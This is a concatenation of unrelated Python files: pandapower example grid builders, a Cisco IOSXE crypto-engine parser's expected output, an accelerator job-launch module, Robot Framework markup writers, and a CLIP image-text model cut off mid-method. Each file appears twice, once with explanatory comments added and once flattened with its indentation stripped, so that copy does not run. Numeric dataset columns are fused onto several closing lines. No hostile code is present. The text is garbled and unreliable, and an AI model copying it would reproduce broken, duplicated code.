                   std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
    pp.create_line(net, name="line 3", from_bus=4, to_bus=5, length_km=1,
                   std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
    pp.create_line(net, name="line 4", from_bus=5, to_bus=6, length_km=1,
                   std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
    pp.create_line(net, name="line 5", from_bus=6, to_bus=1, length_km=1,
                   std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
    pp.create_transformer(net, hv_bus=0, lv_bus=1, std_type="25 MVA 110/20 kV")
    pp.create_load(net, 2, p_kw=1000, q_kvar=200, name="load 0")
    pp.create_load(net, 3, p_kw=1000, q_kvar=200, name="load 1")
    pp.create_load(net, 4, p_kw=1000, q_kvar=200, name="load 2")
    pp.create_load(net, 5, p_kw=1000, q_kvar=200, name="load 3")
    pp.create_load(net, 6, p_kw=1000, q_kvar=200, name="load 4")
    # Two switches per line; the opened one (closed=0) keeps the ring open.
    pp.create_switch(net, bus=1, element=0, et='l')
    pp.create_switch(net, bus=2, element=0, et='l')
    pp.create_switch(net, bus=2, element=1, et='l')
    pp.create_switch(net, bus=3, element=1, et='l')
    pp.create_switch(net, bus=3, element=2, et='l')
    pp.create_switch(net, bus=4, element=2, et='l')
    pp.create_switch(net, bus=4, element=3, et='l', closed=0)
    pp.create_switch(net, bus=5, element=3, et='l')
    pp.create_switch(net, bus=5, element=4, et='l')
    pp.create_switch(net, bus=6, element=4, et='l')
    pp.create_switch(net, bus=6, element=5, et='l')
    pp.create_switch(net, bus=1, element=5, et='l')
    return net
# Copyright (c) 2016 by University of Kassel and Fraunhofer Institute for Wind Energy and Energy
# System Technology (IWES), Kassel. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
import pandapower as pp
def panda_four_load_branch():
    """
    This function creates a simple six bus system with four radial low voltage nodes connected to \
    a medium valtage slack bus. At every low voltage node the same load is connected.

    RETURN:
        **net** - Returns the required four load system

    EXAMPLE:
        import pandapower.networks as pn

        net_four_load = pn.panda_four_load_branch()
    """
    pd_net = pp.create_empty_network()
    # One MV slack bus followed by five LV buses (create_bus returns indices).
    busnr1 = pp.create_bus(pd_net, name="bus1", vn_kv=10.)
    busnr2 = pp.create_bus(pd_net, name="bus2", vn_kv=.4)
    busnr3 = pp.create_bus(pd_net, name="bus3", vn_kv=.4)
    busnr4 = pp.create_bus(pd_net, name="bus4", vn_kv=.4)
    busnr5 = pp.create_bus(pd_net, name="bus5", vn_kv=.4)
    busnr6 = pp.create_bus(pd_net, name="bus6", vn_kv=.4)
    pp.create_ext_grid(pd_net, busnr1)
    pp.create_transformer(pd_net, busnr1, busnr2, std_type="0.25 MVA 10/0.4 kV")
    # Chain the LV buses with identical line segments.
    pp.create_line(pd_net, busnr2, busnr3, name="line1", length_km=0.05,
                   std_type="NAYY 4x120 SE")
    pp.create_line(pd_net, busnr3, busnr4, name="line2", length_km=0.05,
                   std_type="NAYY 4x120 SE")
    pp.create_line(pd_net, busnr4, busnr5, name="line3", length_km=0.05,
                   std_type="NAYY 4x120 SE")
    pp.create_line(pd_net, busnr5, busnr6, name="line4", length_km=0.05,
                   std_type="NAYY 4x120 SE")
    # Identical loads at every LV node downstream of the transformer bus.
    pp.create_load(pd_net, busnr3, 30, 10)
    pp.create_load(pd_net, busnr4, 30, 10)
    pp.create_load(pd_net, busnr5, 30, 10)
    pp.create_load(pd_net, busnr6, 30, 10)
    return pd_net
def four_loads_with_branches_out():
    """
    This function creates a simple ten bus system with four radial low voltage nodes connected to \
    a medium valtage slack bus. At every of the four radial low voltage nodes another low voltage \
    node with a load is connected via cable.

    RETURN:
        **net** - Returns the required four load system with branches

    EXAMPLE:
        import pandapower.networks as pn

        net_four_load_with_branches = pn.four_loads_with_branches_out()
    """
    pd_net = pp.create_empty_network()
    busnr1 = pp.create_bus(pd_net, name="bus1ref", vn_kv=10.)
    pp.create_ext_grid(pd_net, busnr1)
    busnr2 = pp.create_bus(pd_net, name="bus2", vn_kv=.4)
    pp.create_transformer(pd_net, busnr1, busnr2, std_type="0.25 MVA 10/0.4 kV")
    # Main LV feeder: bus3..bus6 chained by line1..line4.
    busnr3 = pp.create_bus(pd_net, name="bus3", vn_kv=.4)
    pp.create_line(pd_net, busnr2, busnr3, name="line1", length_km=0.05,
                   std_type="NAYY 4x120 SE")
    busnr4 = pp.create_bus(pd_net, name="bus4", vn_kv=.4)
    pp.create_line(pd_net, busnr3, busnr4, name="line2", length_km=0.05,
                   std_type="NAYY 4x120 SE")
    busnr5 = pp.create_bus(pd_net, name="bus5", vn_kv=.4)
    pp.create_line(pd_net, busnr4, busnr5, name="line3", length_km=0.05,
                   std_type="NAYY 4x120 SE")
    busnr6 = pp.create_bus(pd_net, name="bus6", vn_kv=.4)
    pp.create_line(pd_net, busnr5, busnr6, name="line4", length_km=0.05,
                   std_type="NAYY 4x120 SE")
    # One branch bus (bus7..bus10) hangs off each feeder bus via line5..line8.
    busnr7 = pp.create_bus(pd_net, name="bus7", vn_kv=.4)
    pp.create_line(pd_net, busnr3, busnr7, name="line5", length_km=0.05,
                   std_type="NAYY 4x120 SE")
    busnr8 = pp.create_bus(pd_net, name="bus8", vn_kv=.4)
    pp.create_line(pd_net, busnr4, busnr8, name="line6", length_km=0.05,
                   std_type="NAYY 4x120 SE")
    busnr9 = pp.create_bus(pd_net, name="bus9", vn_kv=.4)
    pp.create_line(pd_net, busnr5, busnr9, name="line7", length_km=0.05,
                   std_type="NAYY 4x120 SE")
    busnr10 = pp.create_bus(pd_net, name="bus10", vn_kv=.4)
    pp.create_line(pd_net, busnr6, busnr10, name="line8", length_km=0.05,
                   std_type="NAYY 4x120 SE")
    # Loads sit on the branch buses only.
    pp.create_load(pd_net, busnr7, p_kw=30, q_kvar=10)
    pp.create_load(pd_net, busnr8, p_kw=30, q_kvar=10)
    pp.create_load(pd_net, busnr9, p_kw=30, q_kvar=10)
    pp.create_load(pd_net, busnr10, p_kw=30, q_kvar=10)
    return pd_net
def simple_four_bus_system():
    """
    Create a simple four bus example network.

    A medium voltage slack bus feeds two radial low voltage nodes through a
    0.25 MVA transformer; each low voltage node carries one load and one
    static generator.

    RETURN:
         **net** - Returns the required four bus system

    EXAMPLE:
         import pandapower.networks as pn

         net_simple_four_bus = pn.simple_four_bus_system()
    """
    net = pp.create_empty_network()
    # medium voltage slack bus (index 0)
    mv_bus = pp.create_bus(net, name="bus1ref", vn_kv=10)
    pp.create_ext_grid(net, mv_bus)
    # low voltage side of the transformer (index 1)
    lv_bus = pp.create_bus(net, name="bus2", vn_kv=.4)
    pp.create_transformer(net, mv_bus, lv_bus, name="transformer",
                          std_type="0.25 MVA 10/0.4 kV")
    # two radial low voltage nodes (indices 2 and 3), connected in a chain
    node_a = pp.create_bus(net, name="bus3", vn_kv=.4)
    pp.create_line(net, lv_bus, node_a, name="line1", length_km=0.50000,
                   std_type="NAYY 4x50 SE")
    node_b = pp.create_bus(net, name="bus4", vn_kv=.4)
    pp.create_line(net, node_a, node_b, name="line2", length_km=0.50000,
                   std_type="NAYY 4x50 SE")
    # one load and one PV static generator at each radial node
    pp.create_load(net, node_a, 30, 10, name="load1")
    pp.create_load(net, node_b, 30, 10, name="load2")
    pp.create_sgen(net, node_a, p_kw=-20., q_kvar=-5., name="pv1", sn_kva=30)
    pp.create_sgen(net, node_b, p_kw=-15., q_kvar=-2., name="pv2", sn_kva=20)
    return net
def simple_mv_open_ring_net():
    """
    Create a simple medium voltage open ring network with a load at every
    medium voltage node.

    Six 20 kV buses form a ring fed from a 110 kV external grid via a
    25 MVA transformer. The ring is operated open: the switch between
    bus 4 and line 3 is created open (``closed=0``).

    As an example this function is used in the topology and diagnostic docu.

    RETURN:
         **net** - Returns the required simple medium voltage open ring network

    EXAMPLE:
         import pandapower.networks as pn

         net_simple_open_ring = pn.simple_mv_open_ring_net()
    """
    net = pp.create_empty_network()
    pp.create_bus(net, name="110 kV bar", vn_kv=110, type='b')
    pp.create_bus(net, name="20 kV bar", vn_kv=20, type='b')
    pp.create_bus(net, name="bus 2", vn_kv=20, type='b')
    pp.create_bus(net, name="bus 3", vn_kv=20, type='b')
    pp.create_bus(net, name="bus 4", vn_kv=20, type='b')
    pp.create_bus(net, name="bus 5", vn_kv=20, type='b')
    pp.create_bus(net, name="bus 6", vn_kv=20, type='b')
    pp.create_ext_grid(net, 0, vm_pu=1)
    # six ring segments: bus 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> back to 1
    for idx, (from_bus, to_bus) in enumerate([(1, 2), (2, 3), (3, 4),
                                              (4, 5), (5, 6), (6, 1)]):
        pp.create_line(net, name="line %d" % idx, from_bus=from_bus,
                       to_bus=to_bus, length_km=1,
                       std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
    pp.create_transformer(net, hv_bus=0, lv_bus=1, std_type="25 MVA 110/20 kV")
    # one load at every 20 kV ring node (buses 2..6)
    for idx, bus in enumerate(range(2, 7)):
        pp.create_load(net, bus, p_kw=1000, q_kvar=200, name="load %d" % idx)
    # two line switches per segment; the switch between bus 4 and line 3 is
    # open, which makes the ring an open ring
    pp.create_switch(net, bus=1, element=0, et='l')
    pp.create_switch(net, bus=2, element=0, et='l')
    pp.create_switch(net, bus=2, element=1, et='l')
    pp.create_switch(net, bus=3, element=1, et='l')
    pp.create_switch(net, bus=3, element=2, et='l')
    pp.create_switch(net, bus=4, element=2, et='l')
    pp.create_switch(net, bus=4, element=3, et='l', closed=0)
    pp.create_switch(net, bus=5, element=3, et='l')
    pp.create_switch(net, bus=5, element=4, et='l')
    pp.create_switch(net, bus=6, element=4, et='l')
    pp.create_switch(net, bus=6, element=5, et='l')
    pp.create_switch(net, bus=1, element=5, et='l')
    # NOTE: the corrupted source returned "net | 0.847005 | 0.246737"
    # (dataset-column residue); the intended return value is the net itself.
    return net
# Golden (expected) parsed output for the IOSXE "show crypto eli all" parser
# test (ShowCryptoEliAll). 'crypto_eng' holds aggregate DH buffer counters;
# 'crypto_engine' maps each engine name to its capabilities, SSL/TLS cipher
# lists and session counters. The trailing dataset-metadata residue that had
# been fused onto the closing brace has been removed.
expected_output = {
    'crypto_eng': {
        'crypto_engine': 'Software Crypto Engine',
        'crypto_engine_num': 1,
        'dh_in_free': 41008,
        'dh_in_freeing': 0,
        'dh_in_use': 0
    },
    'crypto_engine': {
        'IOSXE-ESP(14)': {
            'capability': 'DES, 3DES, AES, GCM, GMAC, RSA, IPv6, GDOI, FAILCLOSE, ESN',
            'dtlsv1': [],
            'ipsec_session': {
                'active': 6004,
                'created': 414018,
                'failed': 0,
                'max': 40958
            },
            'max_ssl_connec': 10000,
            'ssl_support': 'Yes',
            'ssl_versions': 'TLSv1.0',
            'sslv3': [],
            'state': 'Active',
            'tlsv1': [
                'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
                'TLS_RSA_WITH_AES_128_CBC_SHA',
                'TLS_RSA_WITH_AES_256_CBC_SHA'
            ]
        },
        'Software Crypto Engine': {
            'capability': 'IPPCP, DES, 3DES, AES, SEAL, GCM, GMAC, RSA, P-256, P-384, P-521, IPv6, GDOI, FAILCLOSE, HA',
            'dh': {
                'active': 0,
                'created': 320010,
                'failed': 0,
                'max': 41008
            },
            'dtlsv1': [
                'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
                'TLS_RSA_WITH_AES_128_CBC_SHA',
                'TLS_RSA_WITH_AES_256_CBC_SHA'
            ],
            'ike_session': {
                'active': 0,
                'created': 319288,
                'failed': 0,
                'max': 41058
            },
            'ikev2_session': {
                'active': 3002,
                'created': 319288,
                'failed': 0,
                'max': 41058
            },
            'ipsec_session': {
                'active': 0,
                'created': 0,
                'failed': 0,
                'max': 1000
            },
            'max_ssl_connec': 1000,
            'ssl_namespace': 1,
            'ssl_support': 'Yes',
            'sslv3': [
                'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
                'TLS_RSA_WITH_AES_128_CBC_SHA',
                'TLS_RSA_WITH_AES_256_CBC_SHA'
            ],
            'state': 'Active',
            'tlsv1': [
                'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
                'TLS_RSA_WITH_AES_128_CBC_SHA',
                'TLS_RSA_WITH_AES_256_CBC_SHA'
            ]
        },
        'act2': {
            'capability': 'RSA',
            'state': 'Active'
        }
    },
    'crypto_engines_num': 3,
    'dh_calculations': {
        'p1': 722,
        'ss': 319288
    },
    'dh_lifetime_seconds': 86400,
    'hardware_encryption': 'ACTIVE',
    'number_dh_pregenerated': 4
}
'crypto_eng': {
'crypto_engine': 'Software Crypto Engine',
'crypto_engine_num': 1,
'dh_in_free': 41008,
'dh_in_freeing': 0,
'dh_in_use': 0
},
'crypto_engine': {
'IOSXE-ESP(14)': {
'capability': 'DES, 3DES, AES, GCM, GMAC, RSA, IPv6, GDOI, FAILCLOSE, ESN',
'dtlsv1': [],
'ipsec_session': {
'active': 6004,
'created': 414018,
'failed': 0,
'max': 40958
},
'max_ssl_connec': 10000,
'ssl_support': 'Yes',
'ssl_versions': 'TLSv1.0',
'sslv3': [],
'state': 'Active',
'tlsv1': [
'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
'TLS_RSA_WITH_AES_128_CBC_SHA',
'TLS_RSA_WITH_AES_256_CBC_SHA'
]
},
'Software Crypto Engine': {
'capability': 'IPPCP, DES, 3DES, AES, SEAL, GCM, GMAC, RSA, P-256, P-384, P-521, IPv6, GDOI, FAILCLOSE, HA',
'dh': {
'active': 0,
'created': 320010,
'failed': 0,
'max': 41008
},
'dtlsv1': [
'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
'TLS_RSA_WITH_AES_128_CBC_SHA',
'TLS_RSA_WITH_AES_256_CBC_SHA'
],
'ike_session': {
'active': 0,
'created': 319288,
'failed': 0,
'max': 41058
},
'ikev2_session': {
'active': 3002,
'created': 319288,
'failed': 0,
'max': 41058
},
'ipsec_session': {
'active': 0,
'created': 0,
'failed': 0,
'max': 1000
},
'max_ssl_connec': 1000,
'ssl_namespace': 1,
'ssl_support': 'Yes',
'sslv3': [
'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
'TLS_RSA_WITH_AES_128_CBC_SHA',
'TLS_RSA_WITH_AES_256_CBC_SHA'
],
'state': 'Active',
'tlsv1': [
'TLS_RSA_WITH_3DES_EDE_CBC_SHA',
'TLS_RSA_WITH_AES_128_CBC_SHA',
'TLS_RSA_WITH_AES_256_CBC_SHA'
]
},
'act2': {
'capability': 'RSA',
'state': 'Active'
}
},
'crypto_engines_num': 3,
'dh_calculations': {
'p1': 722,
'ss': 319288
},
'dh_lifetime_seconds': 86400,
'hardware_encryption': 'ACTIVE',
'number_dh_pregenerated': 4
} | 0.498291 | 0.236593 |
from __future__ import print_function
from __future__ import division
import os
import time
from signal import SIGTERM, SIGKILL
from accelerator.compat import PY3
from accelerator.status import children, statmsg_endwait
from accelerator.build import JobError
valid_fds = []
def update_valid_fds():
    """Rebuild the module-level snapshot of currently open fds (>= 3).

    Job processes later use this snapshot (via close_fds) to close
    inherited descriptors they should not keep.
    """
    global valid_fds
    valid_fds = []
    from fcntl import fcntl, F_GETFD
    from resource import getrlimit, RLIMIT_NOFILE
    soft_limit = getrlimit(RLIMIT_NOFILE)[0]
    for candidate in range(3, soft_limit):
        try:
            # F_GETFD only succeeds when the fd refers to an open file.
            fcntl(candidate, F_GETFD)
        except Exception:
            continue
        valid_fds.append(candidate)
def close_fds(keep):
    """Close every fd recorded in valid_fds, except those listed in *keep*.

    Close errors are ignored: a recorded fd may have gone away since the
    last update_valid_fds() snapshot, and that must not break anything.
    """
    for fd in valid_fds:
        if fd in keep:
            continue
        try:
            os.close(fd)
        except OSError:
            pass
def run(cmd, close_in_child, keep_in_child, with_pgrp=True):
    """Fork and exec *cmd*.

    Parent: returns the child's pid immediately.
    Child: optionally becomes its own process group leader (so the whole
    group can be killed if the job fails), closes the fds in
    *close_in_child* plus everything in valid_fds not in *keep_in_child*,
    replaces stdin with /dev/null, then execs cmd. Never returns.

    NOTE(review): assumes BD_STATUS_FD / BD_TERM_FD are set in the
    environment (int() would raise otherwise) — same as the original.
    """
    child = os.fork()
    if child:
        return child  # parent
    if with_pgrp:
        os.setpgrp()  # this pgrp is killed if the job fails
    for fd in close_in_child:
        os.close(fd)
    keep_in_child = set(keep_in_child)
    keep_in_child.add(int(os.getenv('BD_STATUS_FD')))
    keep_in_child.add(int(os.getenv('BD_TERM_FD')))
    close_fds(keep_in_child)
    # unreadable stdin - less risk of stuck jobs
    devnull = os.open('/dev/null', os.O_RDONLY)
    os.dup2(devnull, 0)
    os.close(devnull)
    if PY3:
        keep_in_child.update([1, 2])
        for fd in keep_in_child:
            os.set_inheritable(fd, True)
    try:
        os.execv(cmd[0], cmd)
    finally:
        # execv only returns on failure (by raising). The original called
        # os._exit() with no argument, which is a TypeError (a status is
        # required) and let the OSError from a failed execv propagate back
        # into the parent's code in the child process. Hard-exit non-zero
        # instead so the child can never continue running parent code.
        os._exit(1)
def launch(workdir, setup, config, Methods, active_workdirs, slices, debug, daemon_url, subjob_cookie, parent_pid):
    """Start the job described by *setup* and wait for it to finish.

    The child pid is tracked in the global ``children`` set while it runs,
    and its whole process group is SIGKILLed on the way out so nothing can
    linger. Returns the profiling data collected by the runner, or raises
    JobError if the job reported a failure status.
    """
    starttime = time.time()
    jobid = setup.jobid
    method = setup.method
    if subjob_cookie:
        print_prefix = ''
    else:
        print_prefix = '    '
    print('%s| %s [%s] |' % (print_prefix, jobid, method,))
    args = dict(
        workdir=workdir,
        slices=slices,
        jobid=jobid,
        result_directory=config.get('result_directory', ''),
        common_directory=config.get('common_directory', ''),
        input_directory=config.get('input_directory', ''),
        workdirs=active_workdirs,
        daemon_url=daemon_url,
        subjob_cookie=subjob_cookie,
        parent_pid=parent_pid,
    )
    from accelerator.runner import runners
    runner = runners[Methods.db[method].version]
    child, prof_r = runner.launch_start(args)
    # There's a race where if we get interrupted right after fork this is not recorded
    # (the launched job could continue running)
    try:
        children.add(child)
        status, data = runner.launch_finish(child, prof_r, workdir, jobid, method)
        if status:
            os.killpg(child, SIGTERM)  # give it a chance to exit gracefully
            # The dying process won't have sent an end message, so it has
            # the endwait time until we SIGKILL it.
            print('%s| %s [%s] failed! (%5.1fs) |' % (print_prefix, jobid, method, time.time() - starttime))
        # There is a race where stuff on the status socket has not arrived when
        # the sending process exits. This is basically benign, but let's give
        # it a chance to arrive to cut down on confusing warnings.
        statmsg_endwait(child, 0.1)
    finally:
        try:
            os.killpg(child, SIGKILL)  # this should normally be a no-op, but in case it left anything.
        except Exception:
            pass
        try:
            children.remove(child)
        except Exception:
            pass
        try:
            # won't block long (we just killed it, plus it had probably already exited)
            runner.launch_waitpid(child)
        except Exception:
            pass
    if status:
        raise JobError(jobid, method, status)
    print('%s| %s [%s] completed. (%5.1fs) |' % (print_prefix, jobid, method, time.time() - starttime))
    # The corrupted source had dataset residue fused onto this line
    # ("return data | accelerator/dispatch.py"); the intended statement is:
    return data
from __future__ import print_function
from __future__ import division
import os
import time
from signal import SIGTERM, SIGKILL
from accelerator.compat import PY3
from accelerator.status import children, statmsg_endwait
from accelerator.build import JobError
valid_fds = []
def update_valid_fds():
# Collect all valid fds, so we can close them in job processes
global valid_fds
valid_fds = []
from fcntl import fcntl, F_GETFD
from resource import getrlimit, RLIMIT_NOFILE
for fd in range(3, getrlimit(RLIMIT_NOFILE)[0]):
try:
fcntl(fd, F_GETFD)
valid_fds.append(fd)
except Exception:
pass
def close_fds(keep):
for fd in valid_fds:
# Apparently sometimes one of them has gone away.
# That's a little worrying, so try to protect our stuff (and ignore errors).
try:
if fd not in keep:
os.close(fd)
except OSError:
pass
def run(cmd, close_in_child, keep_in_child, with_pgrp=True):
child = os.fork()
if child:
return child
if with_pgrp:
os.setpgrp() # this pgrp is killed if the job fails
for fd in close_in_child:
os.close(fd)
keep_in_child = set(keep_in_child)
keep_in_child.add(int(os.getenv('BD_STATUS_FD')))
keep_in_child.add(int(os.getenv('BD_TERM_FD')))
close_fds(keep_in_child)
# unreadable stdin - less risk of stuck jobs
devnull = os.open('/dev/null', os.O_RDONLY)
os.dup2(devnull, 0)
os.close(devnull)
if PY3:
keep_in_child.update([1, 2])
for fd in keep_in_child:
os.set_inheritable(fd, True)
os.execv(cmd[0], cmd)
os._exit()
def launch(workdir, setup, config, Methods, active_workdirs, slices, debug, daemon_url, subjob_cookie, parent_pid):
starttime = time.time()
jobid = setup.jobid
method = setup.method
if subjob_cookie:
print_prefix = ''
else:
print_prefix = ' '
print('%s| %s [%s] |' % (print_prefix, jobid, method,))
args = dict(
workdir=workdir,
slices=slices,
jobid=jobid,
result_directory=config.get('result_directory', ''),
common_directory=config.get('common_directory', ''),
input_directory=config.get('input_directory', ''),
workdirs=active_workdirs,
daemon_url=daemon_url,
subjob_cookie=subjob_cookie,
parent_pid=parent_pid,
)
from accelerator.runner import runners
runner = runners[Methods.db[method].version]
child, prof_r = runner.launch_start(args)
# There's a race where if we get interrupted right after fork this is not recorded
# (the launched job could continue running)
try:
children.add(child)
status, data = runner.launch_finish(child, prof_r, workdir, jobid, method)
if status:
os.killpg(child, SIGTERM) # give it a chance to exit gracefully
# The dying process won't have sent an end message, so it has
# the endwait time until we SIGKILL it.
print('%s| %s [%s] failed! (%5.1fs) |' % (print_prefix, jobid, method, time.time() - starttime))
# There is a race where stuff on the status socket has not arrived when
# the sending process exits. This is basically benign, but let's give
# it a chance to arrive to cut down on confusing warnings.
statmsg_endwait(child, 0.1)
finally:
try:
os.killpg(child, SIGKILL) # this should normally be a no-op, but in case it left anything.
except Exception:
pass
try:
children.remove(child)
except Exception:
pass
try:
# won't block long (we just killed it, plus it had probably already exited)
runner.launch_waitpid(child)
except Exception:
pass
if status:
raise JobError(jobid, method, status)
print('%s| %s [%s] completed. (%5.1fs) |' % (print_prefix, jobid, method, time.time() - starttime))
return data | 0.290578 | 0.100084 |
from .markuputils import attribute_escape, html_escape, xml_escape
from .robottypes import is_string
from .robotio import file_writer
class _MarkupWriter(object):
    # Base class for HTML/XML writers. Subclasses supply _escape() (and may
    # override _preamble() and _order_attrs()); this class handles start/end
    # tags, attribute formatting and content escaping.

    def __init__(self, output, write_empty=True):
        """
        :param output: Either an opened, file like object, or a path to the
            desired output file. In the latter case, the file is created
            and clients should use :py:meth:`close` method to close it.
        :param write_empty: Whether to write empty elements and attributes.
        """
        if is_string(output):
            output = file_writer(output)
        self.output = output
        self._write_empty = write_empty
        self._preamble()

    def _preamble(self):
        # Hook for subclasses to write leading content (e.g. XML declaration).
        pass

    def start(self, name, attrs=None, newline=True):
        """Write the opening tag of element `name` with optional attributes."""
        attrs = self._format_attrs(attrs)
        self._start(name, attrs, newline)

    def _start(self, name, attrs, newline):
        self._write('<%s %s>' % (name, attrs) if attrs else '<%s>' % name,
                    newline)

    def _format_attrs(self, attrs):
        # Returns 'k1="v1" k2="v2"' with escaped values. Attributes with
        # empty values are dropped unless write_empty was enabled.
        if not attrs:
            return ''
        attrs = [(k, attribute_escape(attrs[k] or ''))
                 for k in self._order_attrs(attrs)]
        write_empty = self._write_empty
        return ' '.join('%s="%s"' % a for a in attrs if write_empty or a[1])

    def _order_attrs(self, attrs):
        # Default: preserve the given order. Subclasses may sort (HtmlWriter).
        return attrs

    def content(self, content=None, escape=True, newline=False):
        """Write text content; escaped by default, skipped when falsy."""
        if content:
            self._write(self._escape(content) if escape else content, newline)

    def _escape(self, content):
        # Subclass responsibility: escape `content` for the target markup.
        raise NotImplementedError

    def end(self, name, newline=True):
        """Write the closing tag of element `name`."""
        self._write('</%s>' % name, newline)

    def element(self, name, content=None, attrs=None, escape=True,
                newline=True, replace_newlines=False):
        """Write a complete element (start tag, content, end tag).

        Elements with no content and no attributes are skipped entirely
        unless write_empty was enabled.
        """
        attrs = self._format_attrs(attrs)
        if self._write_empty or content or attrs:
            self._start(name, attrs, newline=False)
            # NOTE(review): replace_newlines is forwarded as content()'s
            # `newline` flag — looks intentional, but confirm against callers.
            self.content(content, escape, replace_newlines)
            self.end(name, newline)

    def close(self):
        """Closes the underlying output file."""
        self.output.close()

    def _write(self, text, newline=False):
        self.output.write(text)
        if newline:
            self.output.write('\n')
class HtmlWriter(_MarkupWriter):
    """Markup writer that escapes content for HTML output."""

    def _order_attrs(self, attrs):
        # Deterministic attribute order eases testing.
        return sorted(attrs)

    def _escape(self, content):
        return html_escape(content)
class XmlWriter(_MarkupWriter):
    """Markup writer that emits an XML declaration and escapes for XML."""

    def _preamble(self):
        # Written once, before any element, when the writer is constructed.
        self._write('<?xml version="1.0" encoding="UTF-8"?>', newline=True)

    def _escape(self, text):
        return xml_escape(text)
class NullMarkupWriter(object):
    """Null implementation of _MarkupWriter interface.

    Every operation accepts any positional arguments and does nothing.
    (The source line had dataset metadata fused onto it; this restores the
    original single-lambda implementation with one shared no-op function.)
    """

    def _noop(*args):
        pass

    __init__ = start = content = element = end = close = _noop
    del _noop
from .markuputils import attribute_escape, html_escape, xml_escape
from .robottypes import is_string
from .robotio import file_writer
class _MarkupWriter(object):
def __init__(self, output, write_empty=True):
"""
:param output: Either an opened, file like object, or a path to the
desired output file. In the latter case, the file is created
and clients should use :py:meth:`close` method to close it.
:param write_empty: Whether to write empty elements and attributes.
"""
if is_string(output):
output = file_writer(output)
self.output = output
self._write_empty = write_empty
self._preamble()
def _preamble(self):
pass
def start(self, name, attrs=None, newline=True):
attrs = self._format_attrs(attrs)
self._start(name, attrs, newline)
def _start(self, name, attrs, newline):
self._write('<%s %s>' % (name, attrs) if attrs else '<%s>' % name,
newline)
def _format_attrs(self, attrs):
if not attrs:
return ''
attrs = [(k, attribute_escape(attrs[k] or ''))
for k in self._order_attrs(attrs)]
write_empty = self._write_empty
return ' '.join('%s="%s"' % a for a in attrs if write_empty or a[1])
def _order_attrs(self, attrs):
return attrs
def content(self, content=None, escape=True, newline=False):
if content:
self._write(self._escape(content) if escape else content, newline)
def _escape(self, content):
raise NotImplementedError
def end(self, name, newline=True):
self._write('</%s>' % name, newline)
def element(self, name, content=None, attrs=None, escape=True,
newline=True, replace_newlines=False):
attrs = self._format_attrs(attrs)
if self._write_empty or content or attrs:
self._start(name, attrs, newline=False)
self.content(content, escape, replace_newlines)
self.end(name, newline)
def close(self):
"""Closes the underlying output file."""
self.output.close()
def _write(self, text, newline=False):
self.output.write(text)
if newline:
self.output.write('\n')
class HtmlWriter(_MarkupWriter):
def _order_attrs(self, attrs):
return sorted(attrs) # eases testing
def _escape(self, content):
return html_escape(content)
class XmlWriter(_MarkupWriter):
def _preamble(self):
self._write('<?xml version="1.0" encoding="UTF-8"?>', newline=True)
def _escape(self, text):
return xml_escape(text)
class NullMarkupWriter(object):
"""Null implementation of _MarkupWriter interface."""
__init__ = start = content = element = end = close = lambda *args: None | 0.757077 | 0.142024 |
import torch
import logging
from torch import nn
from transformers import CLIPModel
from .utils import assign_layer_ids
from ..constants import (
IMAGE, IMAGE_VALID_NUM, TEXT_TOKEN_IDS,
TEXT_VALID_LENGTH, LABEL, LOGITS, FEATURES, AUTOMM
)
from typing import Optional
from .utils import init_weights
logger = logging.getLogger(AUTOMM)
class CLIPForImageText(nn.Module):
    """
    Support the CLIP model.
    Refer to https://huggingface.co/docs/transformers/model_doc/clip
    """

    def __init__(
            self,
            prefix: str,
            checkpoint_name: str,
            num_classes: Optional[int] = 0,
    ):
        """
        Load the pretrained CLIP from huggingface transformers.

        Parameters
        ----------
        prefix
            The model prefix.
        checkpoint_name
            Name of the checkpoint.
        num_classes
            The number of classes. 1 for a regression task.
        """
        logger.debug(f"initializing {prefix}")
        super().__init__()
        self.model = CLIPModel.from_pretrained(checkpoint_name)
        self.out_features = self.model.config.projection_dim
        # With num_classes == 0 the head is an identity, so forward() emits
        # the raw joint features as "logits".
        self.head = nn.Linear(self.out_features, num_classes) if num_classes > 0 else nn.Identity()
        self.head.apply(init_weights)
        # Per-modality batch keys are namespaced by the model prefix.
        self.text_token_ids_key = f"{prefix}_{TEXT_TOKEN_IDS}"
        self.text_valid_length_key = f"{prefix}_{TEXT_VALID_LENGTH}"
        self.image_key = f"{prefix}_{IMAGE}"
        self.image_valid_num_key = f"{prefix}_{IMAGE_VALID_NUM}"
        self.label_key = f"{prefix}_{LABEL}"
        self.name_to_id = self.get_layer_ids()
        self.head_layer_names = [n for n, layer_id in self.name_to_id.items() if layer_id == 0]

    def forward(
            self,
            batch: dict,
    ):
        """
        Parameters
        ----------
        batch
            A dictionary containing the input mini-batch data.
            We need to use the keys with the model prefix to index required data.

        Returns
        -------
        A dictionary with logits and features.
        """
        text_token_ids = batch[self.text_token_ids_key]
        text_valid_length = batch[self.text_valid_length_key]
        images = batch[self.image_key]
        image_valid_num = batch[self.image_valid_num_key]
        # Build a 0/1 attention mask from the per-sample valid lengths.
        steps = torch.arange(0, text_token_ids.shape[1]).type_as(text_valid_length)
        text_masks = (steps.reshape((1, -1)) < text_valid_length.reshape((-1, 1))).type_as(text_token_ids)
        assert torch.equal(text_valid_length, text_masks.sum(dim=-1))
        # Images arrive as (batch, num_images, channels, height, width).
        assert images.dim() == 5
        b, n, c, h, w = images.shape
        image_features = self.model.get_image_features(
            pixel_values=images.reshape((b * n, c, h, w)),
        )
        # Zero out padded image slots, then sum over the image dimension.
        steps = torch.arange(0, n).type_as(image_valid_num)
        image_masks = (steps.reshape((1, -1)) < image_valid_num.reshape((-1, 1))).type_as(image_features)  # (b, n)
        image_features = image_features.reshape((b, n, -1)) * image_masks[:, :, None]  # (b, n, num_features)
        image_features = image_features.sum(dim=1)  # (b, num_features)
        text_features = self.model.get_text_features(
            input_ids=text_token_ids,
            attention_mask=text_masks,
        )
        # Here we add up the text and image embeddings
        features = image_features + text_features
